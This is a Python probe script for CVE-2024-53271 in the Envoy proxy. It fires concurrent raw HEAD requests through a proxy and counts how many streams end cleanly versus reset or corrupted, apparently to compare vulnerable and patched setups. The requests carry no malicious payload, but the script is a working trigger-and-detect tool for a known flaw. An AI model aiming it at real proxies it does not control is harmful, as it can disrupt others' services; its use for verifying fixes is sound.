#!/usr/bin/env python3
"""
CVE-2024-53271 differential probe driver.

Drives concurrent HTTP/1.1 HEAD probes through an Envoy proxy and classifies
each probe as CLEAN (the downstream stream reached clean end-of-stream with a
final HTTP/1.1 response) vs FAILED (stream reset / connection error / no clean
end-of-stream). Prints a per-config clean-completion rate.

The exploit only DRIVES and CLASSIFIES the wire behavior; it does not decide
pass/fail. Usage:

    probe.py <label> <host> <port> <path> <count> <concurrency>

Classification (per request), done from raw socket bytes so we observe the
actual downstream HTTP/1.1 framing rather than a client library's smoothing:

  CLEAN  - the proxy returned a well-formed final status line starting with
           "HTTP/1.1 " AND the response framing terminated cleanly (a complete
           header block ending in CRLFCRLF, with Content-Length: 0 / HEAD so no
           body is expected), i.e. clean end-of-stream.
  FAILED - connection error, empty/garbage response, no "HTTP/1.1 " status line
           (e.g. the corrupted "HTTP/0.9"-style / truncated stream the
           vulnerable BALSA parser emits when MessageDone() fires twice), or no
           clean header terminator -> abnormal termination.
"""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor


def _is_interim_response(head):
    """Return True if *head* is the header block of an interim 1xx response.

    *head* is a raw header block without its trailing CRLFCRLF. Only
    "HTTP/1.1 1xx" status lines count; 101 (Switching Protocols) is excluded
    because no further HTTP/1.1 response follows it on the connection.
    """
    parts = head.split(b"\r\n", 1)[0].split(b" ", 2)
    if len(parts) < 2 or parts[0] != b"HTTP/1.1":
        return False
    code = parts[1]
    return (
        len(code) == 3
        and code.isdigit()
        and code[:1] == b"1"
        and code != b"101"
    )


def probe_once(host, port, path, timeout=5.0):
    """Send one raw HEAD request and classify the response.

    Args:
        host: Host name or IP literal to connect to. An IPv6 literal is
            bracketed in the Host header, as HTTP requires.
        port: TCP port to connect to.
        path: Request target placed verbatim in the request line.
        timeout: Seconds allowed for the connect and for each socket
            operation (not a total deadline).

    Returns:
        (clean, detail). ``clean`` is True only when the final (non-1xx)
        response starts with "HTTP/1.1 " and its header block is terminated
        by CRLFCRLF; ``detail`` is then the status line. Otherwise ``clean``
        is False and ``detail`` names the failure. Connection errors are
        reported through the return value, never raised.
    """
    # A bare IPv6 literal in "Host: <host>:<port>" is ambiguous/malformed;
    # only IPv6 literals contain ':' so that is a sufficient test.
    host_header = "[{}]".format(host) if ":" in host else host
    req = (
        "HEAD {} HTTP/1.1\r\n"
        "Host: {}:{}\r\n"
        "User-Agent: cve-2024-53271-probe\r\n"
        "Accept: */*\r\n"
        "\r\n"
    ).format(path, host_header, port).encode()
    s = None
    try:
        s = socket.create_connection((host, port), timeout=timeout)
        s.settimeout(timeout)
        s.sendall(req)
        data = b""
        received = 0
        interim_seen = False
        while True:
            head, sep, rest = data.partition(b"\r\n\r\n")
            if sep:
                if not _is_interim_response(head):
                    break
                # Interim (1xx) responses precede the final one; drop the
                # block and keep looking so only the final status is judged.
                data = rest
                interim_seen = True
                continue
            # Cap on total bytes read, so neither an oversized header block
            # nor an endless run of interim responses can spin forever.
            if received >= 65536:
                break
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                return (False, "recv-timeout (no clean end-of-stream)")
            if not chunk:
                break
            data += chunk
            received += len(chunk)
        if not data:
            if interim_seen:
                return (False, "no-final-response (only interim 1xx received)")
            return (False, "empty-response (stream reset / decoder reset)")
        # First line must be a proper HTTP/1.1 status line.
        first_line = data.split(b"\r\n", 1)[0]
        if not first_line.startswith(b"HTTP/1.1 "):
            return (False, "bad-status-line: {!r}".format(first_line[:40]))
        # Header block must terminate cleanly (clean end-of-stream for HEAD).
        if b"\r\n\r\n" not in data:
            return (False, "no-header-terminator (truncated stream)")
        status = first_line.decode("latin-1", "replace")
        return (True, status)
    except (ConnectionResetError, BrokenPipeError) as e:
        return (False, "conn-reset: {}".format(e))
    except OSError as e:
        # socket.timeout is an OSError subclass, so connect/send timeouts
        # land here as well.
        return (False, "socket-error: {}".format(e))
    finally:
        if s is not None:
            try:
                s.close()
            except OSError:
                # Best-effort close; the classification is already decided.
                pass


def main():
    """Run the probe campaign described by the command line and print a summary.

    Expects exactly six arguments:
    ``<label> <host> <port> <path> <count> <concurrency>``.
    ``<port>`` must be an integer in 1..65535, ``<count>`` an integer >= 0 and
    ``<concurrency>`` an integer >= 1. Any violation writes an error plus the
    usage line to stderr and exits with status 2.

    Prints a header line, up to five sample failure details, and a final
    ``RESULT`` line carrying the clean/failed/total counts and the clean rate.
    This function only reports; it does not decide pass/fail.
    """
    usage = "usage: probe.py <label> <host> <port> <path> <count> <concurrency>\n"
    if len(sys.argv) != 7:
        sys.stderr.write(usage)
        sys.exit(2)
    label, host, port_arg, path, count_arg, concurrency_arg = sys.argv[1:]

    # Reject malformed numbers up front instead of surfacing a traceback
    # (int() failure) or a ThreadPoolExecutor ValueError (concurrency <= 0).
    try:
        port = int(port_arg)
        count = int(count_arg)
        concurrency = int(concurrency_arg)
    except ValueError:
        sys.stderr.write(
            "error: <port>, <count> and <concurrency> must be integers\n" + usage
        )
        sys.exit(2)
    problem = None
    if not 0 < port < 65536:
        problem = "<port> must be in 1..65535"
    elif count < 0:
        # A negative count would otherwise print negative failed/total values.
        problem = "<count> must be >= 0"
    elif concurrency < 1:
        problem = "<concurrency> must be >= 1"
    if problem is not None:
        sys.stderr.write("error: {}\n".format(problem) + usage)
        sys.exit(2)

    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        futs = [pool.submit(probe_once, host, port, path) for _ in range(count)]
        # Collect in submission order; result() blocks until each probe is done.
        results = [f.result() for f in futs]

    clean = sum(1 for ok, _ in results if ok)
    failed = count - clean
    # count == 0 is allowed; report a 0.0% rate rather than dividing by zero.
    rate = (clean / count * 100.0) if count else 0.0

    # Per-request classification (sample of failures for visibility).
    print("=== {} : {}:{}{}  ({} probes, concurrency {}) ===".format(
        label, host, port, path, count, concurrency))
    fail_samples = [d for ok, d in results if not ok]
    for d in fail_samples[:5]:
        print("  FAILED: {}".format(d))
    if len(fail_samples) > 5:
        print("  ... {} more failures".format(len(fail_samples) - 5))
    print("RESULT {}: clean={} failed={} total={} clean_rate={:.1f}%".format(
        label, clean, failed, count, rate))
    print()


# Run the probe campaign only when executed as a script, so importing this
# module does not read sys.argv or open any connections.
if __name__ == "__main__":
    main()
